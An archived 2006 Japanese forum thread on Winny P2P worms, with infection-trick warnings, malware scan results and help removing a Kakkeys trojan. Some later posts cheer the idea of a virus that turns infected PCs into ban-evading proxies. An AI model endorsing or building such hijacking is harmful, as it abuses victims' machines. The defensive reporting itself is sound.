5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

P2Pを狙ったニャーム・ニュイルス解析班 Part53

1 :[名無し]さん(bin+cue).rar:2006/03/25(土) 03:15:33 ID:+VlriRRe0
          ,..-──- 、    
        /. : : : : : : : : : \   
       /.: : : : : : : : : : : : : : ヽ  
  .ni 7  .,!::: : : :,-…-…-ミ: : : : :',
l^l | | l ,/) {:: : : : :i '⌒'  '⌒' i: : : : :}
', U ! レ' / {:: : : : | ェェ  ェェ |: : : : :}   
/    〈  { : : : |   ,.、   |:: : : :;!   .n
ヽ    ヽ-っ::: ::i r‐-ニ-┐ | : : :ノ  l^l.| | /)
 >'´ ̄ ̄´ ゞイ! ヽ 二゙ノ イゞ‐'    | U レ'//)
/ヽ、_ィ-r―‐< \` ー一'´_|      ノ    /
.\ 丁‐イ   ヽ、  ヽ=/  ヽ  rニ     |
  レ' ̄7     ヽィ'.ト、  / ̄ヽ、  `ヽ   l
. !/ ̄7      /::::/ `'´    /_>、匸ニ/|
/厂~/      /::::/   __、  .∧__厂 !jlヽ,/ |
 .l'〃     /::::/ . /   ヽ /ヽ、 l‐"_ lヽ、_/|
 .|      /::::/   ! 抜  | l、 |/ ∧--/ヽ
 !      /::::/   ヽ、___ン .j  ア!、,r' /レ---┤
./     /::::/         !/'    ヽ_ハー─ノ
      /::::/         /

2 :[名無し]さん(bin+cue).rar:2006/03/25(土) 03:16:03 ID:+VlriRRe0
◆装備

OllyDbg v1.10
http://www.ollydbg.de/
DataRescue Home Page
http://www.datarescue.com/
うさみみハリケーン
http://www.vector.co.jp/soft/win95/prog/se375830.html
ProcessWalker Express
http://www001.upp.so-net.ne.jp/yamashita/product/pwexp/pwexp.htm
Sysinternals Freeware
http://www.sysinternals.com/
QEMU
http://fabrice.bellard.free.fr/qemu/
VMware - Virtualization Software
http://www.vmware.com/jp/
Microsoft Virtual PC ホーム
http://www.microsoft.com/japan/windows/virtualpc/default.mspx

3 :[名無し]さん(bin+cue).rar:2006/03/25(土) 03:16:54 ID:hF4/bZP20
『山田はニュイルスではありません』『個別スレがあるならそちらへ』
Winnyで流れている"新種の"ワーム、ウイルス等を報告・調査・対処をするスレです。
質問はテンプレを読んでからにして下さい。
読まずに質問しても「テンプレ嫁」と切り返されるだけです。
余裕があれば過去ログにも目を通してください。

■流行種
・元祖Antinny系 ・キンタマ系 ・batファイル ・スクリーンセーバー etc

■主な流行感染パターン
・exeの前にスペースたくさん(例:「秘密の写真.jpg         .exe」)
・拡張子が.folderに変更されたHTMLからexeを実行させる
・autorunからbatファイルを実行させる
・解凍ソフトの脆弱性を利用し、スタートアップに解凍させて再起動後exeを実行させる

■ダウンロード後のちょっとした注意
・落としたファイルは必ずウイルススキャンする
・exeファイルは安易に実行しない
・ファイルのアイコンが偽装されてないか確認する

■全ての感染者に共通の、確実な対処方法
ハードディスクをフォーマットした上で、Windowsの再インストールをする。
上書きインストールではダメです。
現在ハードディスクにあるデータは消えるので、退避するなり諦めるなりしてください。

wiki&テンプレテキスト
ttp://pwiki.chbox.com/pukiwiki.php?Winny%A4%F2%C1%C0%A4%C3%A4%BF%A1%C1
ttp://z.la/peziq

前スレ
Winnyを狙ったワーム・ニュイルス情報 Part52
http://tmp6.2ch.net/test/read.cgi/download/1141537621/

4 :[名無し]さん(bin+cue).rar:2006/03/25(土) 03:17:25 ID:hF4/bZP20
後のテンプレは面倒くさいなので以下参照
http://pwiki.chbox.com/pukiwiki.php?Winny%A4%F2%C1%C0%A4%C3%A4%BF%A5%EF%A1%BC%A5%E0%A1%A6%A5%CB%A5%E5%A5%A4%A5%EB%A5%B9%BE%F0%CA%F3%20FAQ

5 :[名無し]さん(bin+cue).rar:2006/03/25(土) 03:22:10 ID:i6nS4jRh0
           YES → 【ヒットした?】 ─ YES → じゃあ聞くな。
         /                \  
【検索した?】                     NO → 【半年検索した?】─ YES → なら、ねぇよ。
         \                                   \
            NO → 死ね。                            NO → しろ。

Web検索「Google」
http://www.google.co.jp/

2ch過去ログ検索「にくちゃんねる」
http://makimo.to/


6 :[名無し]さん(bin+cue).rar:2006/03/25(土) 03:23:10 ID:i6nS4jRh0

  / ̄ ̄ ̄ /  /''7 ./''7        / ̄/  /''7
 ./ ./ ̄/ /  /__/ / /  ____    ̄  / /
 'ー' _/ /   ___ノ /  /____/   ___ノ /
   /___ノ   /____,./         /____,./

   _ノ ̄/ / ̄/  /''7 / ̄ ̄ ̄/   / ̄/             /'''7'''7
/ ̄  /    ̄  / /    ̄ フ ./   /  ゙ー-;   ____   / / /._
 ̄/ /     ___ノ /   __/  (___  /  /ー--'゙ /____/ _ノ /i  i/ ./
 /__/   /____,./   /___,.ノゝ_/ /_/           /__,/ ゝ、__/



7 :[名無し]さん(bin+cue).rar:2006/03/25(土) 03:23:33 ID:hF4/bZP20
  / ̄ ̄ ̄ /  /''7 ./''7        / ̄/  /''7
 ./ ./ ̄/ /  /__/ / /  ____    ̄  / /
 'ー' _/ /   ___ノ /  /____/   ___ノ /
   /___ノ   /____,./         /____,./

   _ノ ̄/ / ̄/  /''7 / ̄ ̄ ̄/   / ̄/             /'''7'''7
/ ̄  /    ̄  / /    ̄ フ ./   /  ゙ー-;   ____   / / /._
 ̄/ /     ___ノ /   __/  (___  /  /ー--'゙ /____/ _ノ /i  i/ ./
 /__/   /____,./   /___,.ノゝ_/ /_/           /__,/ ゝ、__/

                                                        しなさい

8 :[名無し]さん(bin+cue).rar:2006/03/25(土) 03:25:07 ID:sT2U3Ns80

├ 1.PCを買い換える
│                              
│    [まちがい]                         
│      確実な方法ではありますが、お金がかかるのが難点です。
│      それよりも別の手段を探してみませんか?
│      ちょっとしたフリーウェアでなんとかなるかも?
│              ↑
│          ココがポイント!

└ 2.RegSeekerを使う

      [せいかい]

Regseeker
ttp://www.hoverdesk.net/freeware.htm
RegSeeker1.3Beta日本語ファイル
ttp://downloads.at.infoseek.co.jp/

9 :[名無し]さん(bin+cue).rar:2006/03/25(土) 03:25:12 ID:4NKAP7ti0
>>1
ワロタ

10 :[名無し]さん(bin+cue).rar:2006/03/25(土) 03:28:27 ID:2teZXdg40
Winnyや掲示板で情報流出を引き起こす「Kakkeys」新亜種、Symantecが警告
http://internet.watch.impress.co.jp/cda/news/2006/03/24/11370.html


11 :[名無し]さん(bin+cue).rar:2006/03/25(土) 03:41:01 ID:eFgsRxnG0
ここ?

12 :[名無し]さん(bin+cue).rar:2006/03/25(土) 03:41:50 ID:2teZXdg40
そうらしいけど、このタイトルじゃたどり着けない人のほうが多いかも
素直にワーム・ウィルススレにしたほうがいいんじゃないのかね

13 :[名無し]さん(bin+cue).rar:2006/03/25(土) 03:43:50 ID:wq8nHgxy0
誰か立て直して

14 :[名無し]さん(bin+cue).rar:2006/03/25(土) 03:45:37 ID:68fQWAC40
別に立て直さなくてもいいだろ
次スレで直せば

15 :[名無し]さん(bin+cue).rar:2006/03/25(土) 03:45:56 ID:K4276G+M0
まだ常駐している香具師なんておるのか。
ニュイルスで引いてるやつはちゃんと辿り着けるんじゃね。

16 :[名無し]さん(bin+cue).rar:2006/03/25(土) 03:48:07 ID:2teZXdg40
まあ、元々スレタイのとおりに機能してるかしてないか
分からないスレだしな

山田は扱わんという方針もよく理解できないし・・・

立てようかと思ったが、このままでやるかね

17 :[名無し]さん(bin+cue).rar:2006/03/25(土) 03:51:38 ID:bz9myPX20
昔はちゃんと調査できる人間がいたんだけどな〜
あ、そうか自分が調査できるようになればいいのか。

18 :[名無し]さん(bin+cue).rar:2006/03/25(土) 03:57:08 ID:hF4/bZP20
>>16
山田は専用スレッドがあるから
そっちで対応っていう話だったはず。
今では山田スレッドの方がかなり有名になちゃって
こっちには新種の報告が全然ない。

19 :[名無し]さん(bin+cue).rar:2006/03/25(土) 04:10:09 ID:Dpc6yQn80
最近は以前と違う空気にはなっているが、なんだかんだで
新種入りのハッシュが貼られれば解析人が出てくるから大丈夫

20 :[名無し]さん(bin+cue).rar:2006/03/25(土) 05:45:43 ID:VQyQJGPB0
次スレ候補で来れたし問題ナス

21 :[名無し]さん(bin+cue).rar:2006/03/25(土) 06:43:22 ID:M4x3kqqe0
とりあえず今回の爆撃のやつ
http://tmp6.2ch.net/test/read.cgi/download/1143078115/275
275 名前:[名無し]さん(bin+cue).rar[sage] 投稿日:2006/03/24(金) 15:09:35 ID:5O+EwLt80
>>220
(一般コミック・雑誌) [ジャンプ] [2006-17] DEATH NOTE 102 我慢.zip 9,552,344 817dac31436ec7b1f381b7ffba69b502

の中身が
Desuno102 .scr
Thums.db

1ヶ月前と同じパターン。

22 :[名無し]さん(bin+cue).rar:2006/03/25(土) 06:54:42 ID:Ot/LWfic0
>>21
うへ。
デスノートを落として中身が"Desuno102 .scr"って
作者は中学生以下か。

まあ、 .scrを踏んじゃうようなバカは
それでも気づかないんだろうな。

23 :[名無し]さん(bin+cue).rar:2006/03/25(土) 07:53:03 ID:z4DIJW+20
ttp://ameblo.jp/jingi-naki/
うわぁ.....まぁね。トレンドがDQNだって、前からわかっていたことだけどw

24 :[名無し]さん(bin+cue).rar:2006/03/25(土) 08:59:25 ID:ytZqMt+E0
Winnyのワーム・ウイルスだからニャーム・ニュイルスって名前つけたんだろ
P2P全般をスレの対象範囲に入れるならワーム・ウイルスって書けよ

25 :[名無し]さん(bin+cue).rar:2006/03/25(土) 09:16:44 ID:M4x3kqqe0
ニューウイルスの略だよ

26 :[名無し]さん(bin+cue).rar:2006/03/25(土) 09:24:01 ID:c8Z7Bjks0
>>22
それはむしろ最後の情けじゃないの

27 :[名無し]さん(bin+cue).rar:2006/03/25(土) 09:53:00 ID:4NKAP7ti0
>>24
DQNが検索して引っかからないのをニヤニヤするんじゃなかったのか

28 :[名無し]さん(bin+cue).rar:2006/03/25(土) 09:57:04 ID:IBsadVks0
つーかDQNじゃなくても引っ掛からねーよ
このスレに来れた奴って、
スレタイが普通の頃に来た奴・スレ一覧でたまたま見つけた奴・他スレから誘導されてきた奴
これがほとんどだろ

こんなスレタイにして喜んでる奴の方がDQNだと思うが

29 :[名無し]さん(bin+cue).rar:2006/03/25(土) 09:58:15 ID:M4x3kqqe0
いつも「ルス」で検索してる俺が最強

30 :[名無し]さん(bin+cue).rar:2006/03/25(土) 10:00:47 ID:68fQWAC40
何度か試してるうちに「ニュイルス」で引っかかるだろ

31 :[名無し]さん(bin+cue).rar:2006/03/25(土) 10:01:24 ID:IBsadVks0
そりゃこのスレの存在を知っていればルスやp2pを狙ったでいいだろうな

もういっその事「ニャ・ニュ part53」でいいじゃん

32 :[名無し]さん(bin+cue).rar:2006/03/25(土) 10:19:44 ID:NPuYP+BxO
テンプレ見てもわからなかったので質問します。なんかidentifiendWorm/VB.HAというウィルスが2000くらい見つかったのですがこれはどう対処すればよいでしょうか?FILE名の所にkimmon.scrと書いてあります。

33 :[名無し]さん(bin+cue).rar:2006/03/25(土) 10:24:10 ID:NPuYP+BxO
あと(ジャーンジャーン○○あわわわ)とも書いてありもう一方にtroianhorseDropper.Generic.CNVとも書いてあります。どうかよろしくお願いします。

34 :[名無し]さん(bin+cue).rar:2006/03/25(土) 10:47:03 ID:ilYr7NLR0
シマンテックに聞け

35 :[名無し]さん(bin+cue).rar:2006/03/25(土) 10:47:58 ID:poFDFVyi0
ググレカス

36 :[名無し]さん(bin+cue).rar:2006/03/25(土) 10:58:32 ID:z4DIJW+20
つーか、『2000くらい見つかった』時点で、人生捨てろ

37 :[名無し]さん(bin+cue).rar:2006/03/25(土) 10:59:06 ID:uKcbOK7o0
自分は「ニュイ」で検索してるな

38 :[名無し]さん(bin+cue).rar:2006/03/25(土) 11:06:13 ID:vCev3Fq00
ID:NPuYP+BxOが発見できるくらいだから
どんな奴でもこのすれには来れる

39 :[名無し]さん(bin+cue).rar:2006/03/25(土) 11:24:31 ID:fC+Hu6Aj0
2chのスレを爆撃するプログラムを抱えているのですが、その対策方法がわかりません。
実行ファイルを削除すればよいとのことですが、どこにも見当たらないのです。
ウイルスバスターと山田チェッカーでは何も検出されませんでした。

アク禁を防ぐためとりあえずtcpmonitorを見ながら2ch(banana340.maido.com)への
パケット送受信を切るのですが、その横のイメージ名(PID)には「taskmgr.exe」。
え?と思ってタスクマネージャを立ち上げようとするとエラーが出ます。

クリーンインストールしかありませんか?

40 :[名無し]さん(bin+cue).rar:2006/03/25(土) 11:33:03 ID:uKcbOK7o0
>>39
System Safety Monitorをインストールして怪しいプロセスの起動を不許可にしてみて
それで2chへの書き込みがストップしたら不許可にしたプロセスを削除
こんな感じでどうだろ?
それとスタートアップ項目のチェックはした?



【FWと併用】System Safety Monitor Part3
http://pc8.2ch.net/test/read.cgi/sec/1132665082/


41 :[名無し]さん(bin+cue).rar:2006/03/25(土) 11:33:34 ID:cYAgPVGl0
>>39
  / ̄ ̄ ̄ /  /''7 ./''7        / ̄/  /''7
 ./ ./ ̄/ /  /__/ / /  ____    ̄  / /
 'ー' _/ /   ___ノ /  /____/   ___ノ /
   /___ノ   /____,./         /____,./

   _ノ ̄/ / ̄/  /''7 / ̄ ̄ ̄/   / ̄/             /'''7'''7
/ ̄  /    ̄  / /    ̄ フ ./   /  ゙ー-;   ____   / / /._
 ̄/ /     ___ノ /   __/  (___  /  /ー--'゙ /____/ _ノ /i  i/ ./
 /__/   /____,./   /___,.ノゝ_/ /_/           /__,/ ゝ、__/

42 :39:2006/03/25(土) 11:41:56 ID:fC+Hu6Aj0
>40
スタートアップですが、きちんとレジストリを確かめてはいませんでした。
見てみたところ…「c:\滝川クリトリス.exe」 あからさまにありました。

これを削除するだけで事態は収まるのでしょうか。
一緒にあった「IMJPMIG8.1」もどこかで見かけたような。

43 :[名無し]さん(bin+cue).rar:2006/03/25(土) 11:42:11 ID:M4x3kqqe0
> banana340.maido.com
これってtmp6だよね?

44 :[名無し]さん(bin+cue).rar:2006/03/25(土) 11:48:34 ID:aSciSP/n0
シマンテックのオンラインスキャンで確認できればいいんだけど
これか?
ttp://www.symantec.com/region/jp/avcenter/venc/data/jp-trojan.kakkeys.d.html

45 :[名無し]さん(bin+cue).rar:2006/03/25(土) 11:50:54 ID:G8sIqgz+0
>>42
cmdで
C:\>taskmgr ってやってみても失敗する?

system32の中のtaskmgr.exeがおかしいんであれば
もしI386フォルダがあるんなら、そん中の
TASKMGR.EX_ を TASKMGR.cab にリネームしてから解凍→system32に放り込むと
とりあえず無傷のタスクマネージャは復活する

だが、別んとこにtaskmgr.exeが作られてて、何かがそっちを呼び出させてる肝吸

46 :[名無し]さん(bin+cue).rar:2006/03/25(土) 12:00:35 ID:poFDFVyi0
何踏んだのよ

47 :39=42:2006/03/25(土) 12:05:54 ID:fC+Hu6Aj0
>44
どうやらそれっぽいですね。現在オンラインスキャン中です。

>45
それは成功しました。というか、今は連投プログラムは動いていないのです。
あれは一度終了(全ポートから送信終了?)するとそれ以上は動作しないようです。

>46
恥ずかしながら.srcを。フォルダ偽装でうっかり。

48 :[名無し]さん(bin+cue).rar:2006/03/25(土) 12:15:18 ID:yZNa2VMk0
>>47
ProcessGuard入れればうっかりしないよ

49 :39=42=47:2006/03/25(土) 12:23:09 ID:fC+Hu6Aj0
あら、何も検出されませんでした。
Trojan.Kakkeys.Dと信じてそこの駆除手順通りにやってみようと思います。
あとIMJPMIGは欄検眼段の説明で見かけたというだけで勘違いでした。

>48
入れてみます。

50 :39=42=47=49:2006/03/25(土) 13:12:43 ID:fC+Hu6Aj0
対象のファイルを削除して再起動したところ、とりあえず連投はなくなったようです。
お騒がせいたしました。本当にありがとうございました。

51 :[名無し]さん(bin+cue).rar:2006/03/25(土) 13:30:14 ID:0G4GwBT80
>>50


52 :[名無し]さん(bin+cue).rar:2006/03/25(土) 13:41:36 ID:+J/xe0lo0
>>47
どの.scrだったか教えてくれ。

53 :[名無し]さん(bin+cue).rar:2006/03/25(土) 16:56:20 ID:sux/6T3x0
(一般コミック・雑誌) [ジャンプ] [2006-17] DEATH NOTE 102 我慢.zip 817dac31436ec7b1f381b7ffba69b502

Whiter系
ノートン・バスター無反応

54 :[名無し]さん(bin+cue).rar:2006/03/25(土) 18:27:52 ID:h46W0fkF0
Winnyを狙ったワーム・ニュイルス情報 Part53
http://tmp6.2ch.net/test/read.cgi/download/1143252398/

55 :[名無し]さん(bin+cue).rar:2006/03/25(土) 18:53:40 ID:bQyWB3Uf0
>>53のファイル

AntiVir6.34.0.1403.24.2006no virus found
Avast4.6.695.003.25.2006no virus found
AVG38603.24.2006PSW.Generic.AGB
Avira6.34.0.5403.24.2006no virus found
BitDefender7.203.25.2006no virus found
CAT-QuickHeal8.0003.24.2006no virus found
ClamAVdevel-2006020203.24.2006no virus found
DrWeb4.3303.25.2006Trojan.PWS.Ruby
eTrust-InoculateIT23.71.11103.25.2006Win32/Ruby.Kakkeys.B!Trojan
eTrust-Vet12.4.213303.24.2006no virus found
Ewido3.503.24.2006no virus found
Fortinet2.71.0.003.25.2006suspicious
F-Prot3.16c03.23.2006no virus found
Ikarus0.2.59.003.24.2006Trojan.Win32.Agent.EZ
Kaspersky4.0.2.2403.25.2006no virus found
McAfee472603.24.2006no virus found
NOD32v21.145803.24.2006no virus found
Norman5.70.1003.24.2006no virus found
Panda9.0.0.403.25.2006no virus found
Sophos4.04.003.24.2006no virus found
Symantec8.003.25.2006no virus found
TheHacker5.9.7.11903.24.2006no virus found
UNA1.8303.23.2006Trojan.Spy.Win32.Kakkeys
VBA323.10.503.24.2006Trojan.PWS.Ruby

56 :[名無し]さん(bin+cue).rar:2006/03/25(土) 19:03:31 ID:KxW4YI8p0
AVG頑張ってるな〜

57 :[名無し]さん(bin+cue).rar:2006/03/25(土) 19:16:25 ID:hF4/bZP20
それにしてアンチウイルスベンダーって世界中にこんなにもあるのか

58 :[名無し]さん(bin+cue).rar:2006/03/25(土) 19:22:54 ID:goLYQffg0
>>57

= ニュイルス作者がこんなにいる

59 :[名無し]さん(bin+cue).rar:2006/03/25(土) 19:46:49 ID:z4DIJW+20
最近雨後の筍状態だよね。特に新興勢力が。
まともなのは、数社に限られるけど

60 :[名無し]さん(bin+cue).rar:2006/03/25(土) 20:24:57 ID:fn+Zn35K0
               ,..-──- 、   
                /. : : : : : : : : : \      
               /.: : : : : : : : : : : : : : ヽ      ______________
              ,!::: : : :,-…-…-ミ: : : : :',   /
             {: : : : :i '⌒'  '⌒' i: : : : :} < うちもアンチウイルスはじめたぜ!!
          { : : : : | ェェ  ェェ |: : : : :}   \______________
             { : : : ::|   ,.、   |:: : : :;!     , 、
            ヾ: :: :| r--ニ-┐ |: : ::/ __  / /    
  .          ゞ-イi、ヽ二´.ノ /┬〈  l-`ー〈 {  
           / \ヽ`' ―- ´/ \ lー   |    ビシュッ ! 
          Y´⌒` r‐-‐-‐/`ヽ、≡= l二,    ヽ
          |____`ーl|_,|_,|_,hに丿ヽ ≡=  ヽ  ノ\
          .| ̄\_.| `~`".`´ ´“⌒⌒)≡= -厂,二/ヽ
          . |⌒\人  入_ノ´~ ̄ ≡=  |へ  /ヽ
           l`'r./   // /''  ≡=─ | 、__ ̄ ,∧

61 :[名無し]さん(bin+cue).rar:2006/03/25(土) 20:41:09 ID:KaLeeAo90
頑張ってるというか検体送ってくれるやつがいるかどうかじゃないの?

62 :[名無し]さん(bin+cue).rar:2006/03/25(土) 22:09:35 ID:7OTcI1qY0
eTrustで引っかかるのか、めずらしや

63 :[名無し]さん(bin+cue).rar:2006/03/25(土) 22:24:13 ID:1f1eubRr0
>>53
つーか>>21の時点でKakkeysだって割れてんのに何がWhiterだ。アホかと。

64 :[名無し]さん(bin+cue).rar:2006/03/25(土) 23:04:28 ID:e7QXiqvf0
CrashOnCtrlScroll

65 :[名無し]さん(bin+cue).rar:2006/03/25(土) 23:13:14 ID:LbUb7JTi0
http://www.uploda.org/uporg346440.png

66 :[名無し]さん(bin+cue).rar:2006/03/26(日) 02:41:45 ID:Y4vZEWb50
>>65
ドナルド?

67 :[名無し]さん(bin+cue).rar:2006/03/26(日) 09:01:28 ID:qjGCq50Y0
P2P ウィルス キンタマ辺りはスレタイに欲しいね
変な奴もくるのは確かだけど
ウィルス食らってしまってどうしたらいいかわからない初心者もいる
他者にも迷惑かけるから「自己責任」だけどそうは言ってられない

68 :[名無し]さん(bin+cue).rar:2006/03/26(日) 09:04:38 ID:J9RP269E0
>>67
別に初心者を救済するスレじゃないでしょ?

69 :[名無し]さん(bin+cue).rar:2006/03/26(日) 10:16:27 ID:DZvUp1/h0
変な奴=ウィルス食らってしまってどうしたらいいかわからない初心者
かと思ってたぜ

70 :[名無し]さん(bin+cue).rar:2006/03/26(日) 10:59:38 ID:Ephg1cNR0
今のスレタイの方が変な奴回避率が高い

71 :[名無し]さん(bin+cue).rar:2006/03/26(日) 11:39:35 ID:YbZ7yKPg0
ニャームとかニュイルスとか書かれてるスレに来るような奴はまともじゃありませんから

72 :[名無し]さん(bin+cue).rar:2006/03/26(日) 12:00:38 ID:SDBCHs9n0
オレノコトカー

73 :[名無し]さん(bin+cue).rar:2006/03/26(日) 12:05:57 ID:qjGCq50Y0
もしかしたら俺かもしれない

74 :[名無し]さん(bin+cue).rar:2006/03/26(日) 13:21:54 ID:SG9l5VeY0
あたしあたし

75 :[名無し]さん(bin+cue).rar:2006/03/26(日) 13:42:30 ID:58hFNw380
俺、俺だよ

76 :[名無し]さん(bin+cue).rar:2006/03/26(日) 14:23:42 ID:lNvZDuIz0
わしの事かのぅ

77 :[名無し]さん(bin+cue).rar:2006/03/26(日) 15:42:38 ID:OkvhmxTi0
ニャームニャーム

78 :[名無し]さん(bin+cue).rar:2006/03/26(日) 16:22:31 ID:DEMDtx2s0
お仏壇の(ry

79 :[名無し]さん(bin+cue).rar:2006/03/26(日) 19:57:48 ID:h44JbsIC0
今のスレタイは解析できる人間を来れないようにしてる
ダウン板のスレだけニュイルスなんて知るはずもないね
無いなら別にいいやって思うだろうし
むしろ感染した初心者なんかがセキュ板とかで必死に聞きまわってここに誘導される

まあこんなスレタイになった時に立て直そうとしなかったのが住民の質を物語ってるからどうしようもないんだが

80 :[名無し]さん(bin+cue).rar:2006/03/26(日) 20:00:10 ID:HCOkD81E0
お前みたいのが来れるなら大丈夫だよ

81 :[名無し]さん(bin+cue).rar:2006/03/26(日) 20:04:59 ID:ibJmeVMz0
解析屋さんがいたころから、ニャーム・ニュイルスと命名されていた
んだがな。スレ違いの厨房避けにいろいろタイトルを検討したもんだ。

82 :[名無し]さん(bin+cue).rar:2006/03/26(日) 20:10:48 ID:h44JbsIC0
まあその行為自体が厨房なんだが
程度の低い解析人(?)しかいないのが全てを物語っている
このスレには解析人気取りの厨房しかいない事実

83 :[名無し]さん(bin+cue).rar:2006/03/26(日) 20:14:31 ID:HCOkD81E0
つまんないからもういいよ

84 :[名無し]さん(bin+cue).rar:2006/03/26(日) 20:14:49 ID:h44JbsIC0
そういえば新種が出た時にこのスレから真っ先に情報が出た事ないよな
他の板や2ちゃん外からの情報を書き込むだけ
ニャーム・ニュイルス解析班とは名ばかりだ

85 :[名無し]さん(bin+cue).rar:2006/03/26(日) 20:15:42 ID:h44JbsIC0
>>83
ああごめん
不快にさせる気は無かったんだけど
お暇しま

86 :[名無し]さん(bin+cue).rar:2006/03/26(日) 21:08:39 ID:Ephg1cNR0
報告・調査・対処をするスレだから、解析班ってのは違うかもな。
>>84の「他の板や2ちゃん外からの情報」をこのスレに集約出来れば、
スレの意義はある。

87 :[名無し]さん(bin+cue).rar:2006/03/26(日) 21:48:53 ID:5QVJdLwJ0
串鯖にしてくれて踏み台にしてくれるウィルスねえかな
2ちゃんにそいつを踏み台にして書き込み出来るしw

88 :[名無し]さん(bin+cue).rar:2006/03/26(日) 22:38:24 ID:8209q0+G0
山田オルタみたいに感染者ネットワーク機能付きで、
感染者が別の感染者踏み台にして爆破予告とか田代打ったりとかしたら・・・・

恐ろし(´・ω・)ス

89 :[名無し]さん(bin+cue).rar:2006/03/26(日) 22:53:35 ID:tzPWbLJv0
ここはウィルス作者にこんなウィルスまだ〜?とリクするスレですか。

90 :[名無し]さん(bin+cue).rar:2006/03/26(日) 22:56:45 ID:X3CfD94g0
ふむ。

91 :[名無し]さん(bin+cue).rar:2006/03/26(日) 22:57:36 ID:X3CfD94g0
nyネットワーク経由で、2chへの
書き込み補助機能つきウィルスとソフトをnyで流すと
2chで使える串みたいなものだな

92 :[名無し]さん(bin+cue).rar:2006/03/26(日) 23:01:13 ID:D9ppJX260
>>87
2chで使える串が少なくなってるからいいかもwww
動的IPならピンポイント規制なんて屁みたいなもんだし
リスト化してnyで拾えるようにしてくれれば尚グッジョブ!

93 :[名無し]さん(bin+cue).rar:2006/03/26(日) 23:01:28 ID:ibJmeVMz0
その昔、東芝のハードディスクレコーダがそういう踏み台にされて、
わりと騒ぎになってたよな。いまでも残ってるらしいけど。

ttp://www.rd-style.com/support/info/security/security.htm

94 :[名無し]さん(bin+cue).rar:2006/03/26(日) 23:07:56 ID:dzcnp/z20
ようは、こういうものをこっそり仕込むっていうのだろ?

【匿名性】2ちゃんねら向きのP2Pプロキシ【向上】
http://pc8.2ch.net/test/read.cgi/tech/1085187225/

もしくは、問答無用でTor鯖にしちまうとか?

Tor (トーア) - The Onion Router 2
http://pc7.2ch.net/test/read.cgi/software/1121341885/

95 :[名無し]さん(bin+cue).rar:2006/03/26(日) 23:20:50 ID:8209q0+G0
火壁がなかったらまず感染には気づかないよなぁ・・・・・・

ところで、無理矢理串鯖にするってのはウイルスに認定されるんだろうか?

96 :[名無し]さん(bin+cue).rar:2006/03/26(日) 23:37:27 ID:Y0SWFtK50
Torも結構弾くよ、2chは

97 :[名無し]さん(bin+cue).rar:2006/03/26(日) 23:54:25 ID:mjEHPta20
規制されたら自動的に接続切って再接続してIP変更wwww
そうすれば半永久的に串として使えるなwwwうぇwwうぇwww

98 :[名無し]さん(bin+cue).rar:2006/03/26(日) 23:57:03 ID:Xv79nnrY0
テンプレを32行以内にまとめようぜ。
今のは無意味に長すぎ。

99 :[名無し]さん(bin+cue).rar:2006/03/27(月) 00:38:27 ID:RsuIZOtz0
>>98
「まとめようぜ」と呼びかけるだけじゃなく
「まとめてみました」と言いつつ提案する方が話が進みやすいと思うよ

100 :[名無し]さん(bin+cue).rar:2006/03/27(月) 01:10:32 ID:Fl+KGHRo0
upフォルダに勝手に暁のラブレター.exeみたいなファイルがupされてたんですが
これはウイルスでしょうか

101 :[名無し]さん(bin+cue).rar:2006/03/27(月) 01:13:59 ID:6Kt4bPM00
解析するような新種が出てくればねぇ…と思いつつ常駐しているが、

まぁ心配しなくても、何かあったらスレも走るし

102 :[名無し]さん(bin+cue).rar:2006/03/27(月) 01:38:46 ID:JtfagpEr0
>>100
>>6

103 :[名無し]さん(bin+cue).rar:2006/03/27(月) 06:34:01 ID:fq/lUL9u0
||Φ|(|´|Д|`|)|Φ||

104 :[名無し]さん(bin+cue).rar:2006/03/27(月) 14:13:41 ID:DFv4BWqx0
少々スレ違いになるかも知れないけど、ウイルス解析に関する技術持ってる人はこのスレにいそうなのでここで。
ウイルスがミューテックスを作成していた場合、どんなミューテックスが作成されているか解析する方法はあるかな?

http://www.symantec.com/region/jp/avcenter/venc/data/w32.netsky@mm.html
>テクニカルノート
>"AdmMoodownJKIS003" というミューテックスを作成することによって、メモリ上でワームが 1 度に 1 つのみ実行されるようにします
例えば↑で言うところの"AdmMoodownJKIS003"の部分みたいな感じで。

必要なソフトとか方法があれば教えてください。

105 :[名無し]さん(bin+cue).rar:2006/03/27(月) 16:48:30 ID:bo+r1m3R0
ttp://internet.watch.impress.co.jp/cda/news/2006/03/27/11385.html
トレンドマイクロの営業資料がWinnyに流出

106 :[名無し]さん(bin+cue).rar:2006/03/27(月) 16:50:35 ID:lozO5bgf0
ワロスwww

107 :[名無し]さん(bin+cue).rar:2006/03/27(月) 16:51:40 ID:k2Z2BiTX0
信用がた落ちだなw

108 :[名無し]さん(bin+cue).rar:2006/03/27(月) 16:53:04 ID:p/9//cE50
これはひどいw

109 :[名無し]さん(bin+cue).rar:2006/03/27(月) 17:55:05 ID:lMREvo/+0
>なお、この社員は自宅PCにウイルス対策ソフトを利用していなかった。

    _____         _______       _____
   │  ___  │        | ___   |        |___  │
   │_│ /  /         | |.    |.  |           /  /
        /  /           | |_____|.  |         /   ヽ
    _ /  /__        .  | ____   |        _/ /ヽ  ヽ
   / ⌒   ⌒ ::: \     / ⌒   ⌒ ::: \     / ⌒   ⌒ ::: \
   | (●), 、(●)、 |    | (●), 、(●)、 |.    | (●), 、(●)、 |
   |  ,,ノ(、_, )ヽ、,,   |    |  ,,ノ(、_, )ヽ、,,   |    |  ,,ノ(、_, )ヽ、,,   |
   |  `-=ニ=- '   .:::::|    |  `-=ニ=- '   .:::::|    |  `-=ニ=- '   .:::::|
   \  `ニニ´  .:::/     \  `ニニ´  .:::/     \  `ニニ´  .:::/



110 :[名無し]さん(bin+cue).rar:2006/03/27(月) 18:31:42 ID:tt8JHREA0
さすがトレンドマイクロクオリティ


111 :[名無し]さん(bin+cue).rar:2006/03/27(月) 21:31:33 ID:s/Bti0SE0
ウイルスバスター(笑)

112 :[名無し]さん(bin+cue).rar:2006/03/27(月) 22:43:20 ID:dvaB9H6O0
トレンドはうpだてでもやらかしてくれた

113 :[名無し]さん(bin+cue).rar:2006/03/27(月) 23:10:07 ID:1mgV8t3g0
>>112
ああ、あの時はたいへんだったよ。

114 :[名無し]さん(bin+cue).rar:2006/03/27(月) 23:13:54 ID:Mx2483uL0
落としてみてみたらファイルの検索のかけ方が
「アニメ -18 -ガンダム -プラネテス -R.O.D -ロードス -鋼 -part」
だった。
家のパソコンに息子がWinnyを入れて感染しましたってとこかな。
